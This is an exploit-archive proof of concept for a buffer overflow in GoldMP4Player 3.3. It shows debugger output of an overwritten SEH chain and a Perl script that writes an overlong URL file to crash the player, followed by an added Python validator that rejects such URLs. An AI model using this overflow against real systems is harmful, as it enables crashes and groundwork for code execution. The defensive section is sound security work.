GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)
Source: vfocus.net  Author: Seljan  Published: 2014-02-28
#---------------------------------------------------------------------------------#
# Exploit Title: GoldMP4Player 3.3 - Buffer Overflow PoC (SEH)                    #
# Date: Feb 25 2014                                                               #
# Exploit Author: Gabor Seljan                                                    #
# Software Link: http://download.cnet.com/GoldMP4Player/3000-2139_4-10967424.html #
# Version: 3.3                                                                    #
# Tested on: Windows XP SP3                                                       #
#---------------------------------------------------------------------------------#
  
# (cb4.cb0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=05506f41 ebx=00000111 ecx=05503ff1 edx=00130000 esi=05506fe0 edi=00000003
# eip=0041a0c3 esp=0012e25c ebp=054f4f88 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# *** WARNING: Unable to verify checksum for image00400000
# *** ERROR: Module load completed but symbols could not be loaded for image00400000
# image00400000+0x1a0c3:
# 0041a0c3 8802            mov     byte ptr [edx],al          ds:0023:00130000=41
# 0:000> !exchain
# 0012e270: image00400000+4c1b3 (0044c1b3)
# 0012e3b0: image00400000+4c56a (0044c56a)
# 0012e430: image00400000+4c4ec (0044c4ec)
# 0012e4e0: *** ERROR: Symbol file could not be found.
# 0012e534: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e748: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e7a8: USER32!DeregisterShellHookWindow+1cf (7e44048f)
# 0012e8cc: image00400000+4c333 (0044c333)
# 0012e9f4: <Unloaded_ION.dll>+41414140 (41414141)
# Invalid exception stack at 41414141
  
#!/usr/bin/perl
  
use strict;
use warnings;
  
my $filename = "poc.txt";
  
my $junk = "A" x 10000;
  
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "http://$junk.swf";
close(FILE);
  
print "Exploit file created successfully [$filename]!\n";
print "Now open the URL in $filename via File -> Open Flash URL\n";
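
A pre-open check that a launcher or file-scanning script could apply to URLs before they reach a player like this one, as an added example (not part of the original PoC or of the player's code). The function names and the 2048-character cap are assumptions, and the sample input in the usage note is constructed to match the shape the PoC writes.

```python
from urllib.parse import urlsplit

MAX_URL = 2048    # assumed policy cap, not a value taken from the player
MAX_HOST = 253    # longest host name DNS can represent in text form
MAX_LABEL = 63    # RFC 1035 limit on one dot-separated label


def url_findings(url):
    """Return the reasons a URL should be rejected (empty list = accept)."""
    findings = []
    if len(url) > MAX_URL:
        findings.append("url-too-long")
    try:
        parts = urlsplit(url)
    except ValueError:
        # urlsplit raises on malformed bracketed (IPv6) hosts
        return findings + ["unparseable"]
    if parts.scheme not in ("http", "https"):
        return findings + ["bad-scheme"]
    host = parts.hostname or ""
    if not host:
        findings.append("no-host")
    if len(host) > MAX_HOST:
        findings.append("host-too-long")
    if any(len(label) > MAX_LABEL for label in host.split(".")):
        findings.append("label-too-long")
    return findings


def scan_lines(lines):
    """Return (line_number, findings) for every rejected URL, one URL per line."""
    rejected = []
    for number, line in enumerate(lines, start=1):
        url = line.strip()
        if not url:
            continue
        findings = url_findings(url)
        if findings:
            rejected.append((number, findings))
    return rejected
```

Calling `scan_lines(["http://example.com/movie.swf", "http://" + "A" * 10000 + ".swf"])` rejects only the second (constructed) line, on all three length checks.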

 